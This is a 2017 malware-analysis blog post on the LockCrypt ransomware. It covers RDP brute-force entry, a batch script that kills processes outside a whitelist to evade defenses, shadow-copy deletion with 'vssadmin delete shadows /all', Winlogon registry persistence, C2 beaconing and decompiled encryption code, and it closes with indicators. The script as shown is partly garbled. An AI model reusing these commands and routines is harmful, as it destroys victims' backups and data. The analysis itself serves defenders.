This is all about malware analysis, reverse engineering and some cool stuff

Thursday, 30 November 2017

Analysis of LockCrypt ransomware

November 30, 2017 Posted by SDKHERE , No comments

Attackers have been recently breaking into corporate servers via RDP brute force attacks to spread a new variant of ransomware called LockCrypt. The attacks first started in June but there was an increase of attacks in October. The victims were asked to pay 0.5 to 1 BTC to recover their server.
LockCrypt encrypts all files and rename them with a '.lock' extension. It also installs itself for persistence and deletes backup.

Let's have a look at the sample.

MD5 : 12A4388ADE3FAD199631F6A00894104C [VirusTotal] [HybridAnalysis]
Size  : 48128 bytes

When we execute this sample, following dialogue box will appear.

Fig1 : Window after execution of malware

Environment Setup :

On execution, First of all it copies itself to C:\Windows\bfsvcm.exe
Then it creates a batch file of name w.bat and execute it to kill all the specified processes, this is for antivirus and sandbox evasion.

You can see the batch script below.

SetLocal EnableDelayedExpansion EnableExtensions
Set WinTitle=%Random%%Random%
Title %WinTitle%
For /F "tokens=2 skip=2 delims=," %%P In ('tasklist /FI "WINDOWTITLE eq %WinTitle%" /FO CSV') Do (Set MyPID=%%~P)
Title %~n0
Set WhiteList=Microsoft.ActiveDirectory.WebServices.exe:cmd.exe:find.exe:conhost.exe:explorer.exe:ctfmon.exe:dllhost.exe:lsass.exe:services.exe:smss.exe:tasklist.exe:winlogon.exe:wmiprvse.exe:msdts.exe:bfsvc.exe:AdapterTroubleshooter.exe:alg.exe:dwm.exe:issch.exe:rundll32.exe:spoolsv.exe:wininit.exe:wmiprvse.exe:wudfhost.exe:taskmgr.exe:rdpclip.exe:logonui.exe:lsm.exe:spoolsv.exe:dwm.exe:dfssvc.exe:csrss.exe:svchost.exe:59F6B4DF10330000_59F6B4E800000000.exe:=5 delims=," %%p In ('tasklist /FO CSV') Do (Echo :!ProcList!|Find /I ":%%~p:">nul||Set ProcList=%%~p:!ProcList!)
For /F "tokens=1,* delims=:" %%C In ("!ProcList!") Do (
If Not "%%C"=="" (
Echo :!WhiteList!|Find /I ":%%C:">nul||Call :Kill "%%C"
Set ProcList=%%D
GoTo Compare
If "%~1"=="cmd.exe" (
TaskKill /F /FI "PID ne %MyPID%" /FI "IMAGENAME eq cmd.exe"
) Else (
TaskKill /F /IM "%~1"
del W.bat
Exit /B

After processes termination, It calls DialogBoxParamA windows API.
It is abusing windows API to execute malicious procedure.

You can see the below code.

Fig2 : DialogBoxParamA function call

Here we have callback function for dialog box, so we will not skip this API.
Let's look into the callback function.
Here we have multiple cases, in first case it is playing with registry.

First it ShellExecute the following command to delete backup storage.
"vssadmin delete shadows /all"
After that it creates a "Hacked" subkey in the following registry key.
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Fig3 : Storing victim id in registry

By default it is initializing value of "Hacked" as "SfplHinIptOwnboa".
This is unique victim's id and it is very useful in encryption process, this value is changes and reassign to registry later.

After that, It will modify below subkeys and values of the same registry key.

LegalNoticeCaption = "Attention!!! Your files are encrypted !!!"
LegalNoticeText = "To recover files, follow the prompts in the text file "Readme""
Userinit = "C:\Windows\system32\userinit.exe, C:\Windows\bfsvcm.exe"

This is for displaying message on logon screen of user's system.

Fig4 : Logon screen

You can see the registry of my infected system.

Fig5 : Registry of infected system

Encryption Process :

After the above environment setup, it creates victim's id and store it into "Hacked" registry mentioned above.
Code for creating unique victim's id is :

unsigned int sub_401AC7()
  unsigned int v0; // eax@1

  v0 = dword_40C86F;
  if ( !dword_40C86F )
    v0 = GetTickCount();
    dword_40C86F = v0;
  dword_40C86F = 16807 * (v0 % 0x1F31D) - 2836 * (v0 / 0x1F31D);
  return dword_40C86F % 0x64u;

After creating and assigning id to registry, the ransomware will send the base64 encoded victim information to the command and control server.

Fig6 : Packet sent to C2 server

The IP address of the server is 46.32.17[.]222 and the format of the information sent to server is.
Victim_ID | Operating_System | System | Malware_Location

When the server get this information, it sends huge data in response to that.

Fig7 : Server response after getting victim's info

This data is unique and depends on the victim's information and it plays a major role in encryption process.

The encryption algorithm is very simple, it just XOR and ByteSwapping of file data with data received from server.
You can see the encryption algorithm used by this ransomware below.

unsigned __int32 __stdcall sub_401865(int a1, unsigned int a2)
  int v2; // ecx@1
  int v3; // edx@1
  int v4; // ebx@1
  int v5; // esi@1
  int v6; // edi@1
  unsigned int v7; // ecx@5
  int v8; // edx@5
  int v9; // ebx@5
  int v10; // esi@5
  int v11; // edi@5
  int v12; // eax@6
  unsigned __int32 result; // eax@6

  v2 = 2 * (a2 >> 2);
  v3 = dword_40D83C;
  v4 = dword_40D5B0 + dword_40D83C;
  v5 = a1;
  v6 = a1;
    *(_DWORD *)v6 = *(_DWORD *)v3 ^ *(_DWORD *)v5;
    v5 += 2;
    v6 += 2;
    v3 += 4;
    if ( v3 == v4 )
      v3 = dword_40D83C;
  while ( v2 );
  v7 = a2 >> 2;
  v8 = dword_40D83C;
  v9 = dword_40D5B0 + dword_40D83C;
  v10 = a1;
  v11 = a1;
    v12 = *(_DWORD *)v10;
    v10 += 4;
    v12 = __ROL4__(v12, 5);
    result = _byteswap_ulong(*(_DWORD *)v8 ^ v12);
    *(_DWORD *)v11 = result;
    v11 += 4;
    v8 += 4;
    if ( v8 == v9 )
      v8 = dword_40D83C;
  while ( v7 );
  return result;

It is very hard to make decryption tool for this ransomware because the data is changing as per the victim id and also we don't know the server side algorithm.
It skips first 4 bytes and last 6 bytes of every file and encrypt rest of the data.

After the encryption, it will rename each file in the following format.
File extension : [base64 of filename] ID [Victim ID].lock

It drops ReadMe.TxT in C:\ which is a ransom note, makes run entry for the same to execute it on startup.
Microsoft Windows Operating System = "C:\Windows\notepad.exe C:\ReadMe.TxT"

Fig8 : Ransom note (ReadMe.TxT)

IOCs :

Hash  : 1df3d4da1ef11373966f54a6d67c38a223229f272438e1c6ec7cb4c1ea3ff3e2
CnC   : 46.32.17[.]222
Email : enigmax_x@aol[.]com and enigmax_x@bitmessage[.]ch


Post a Comment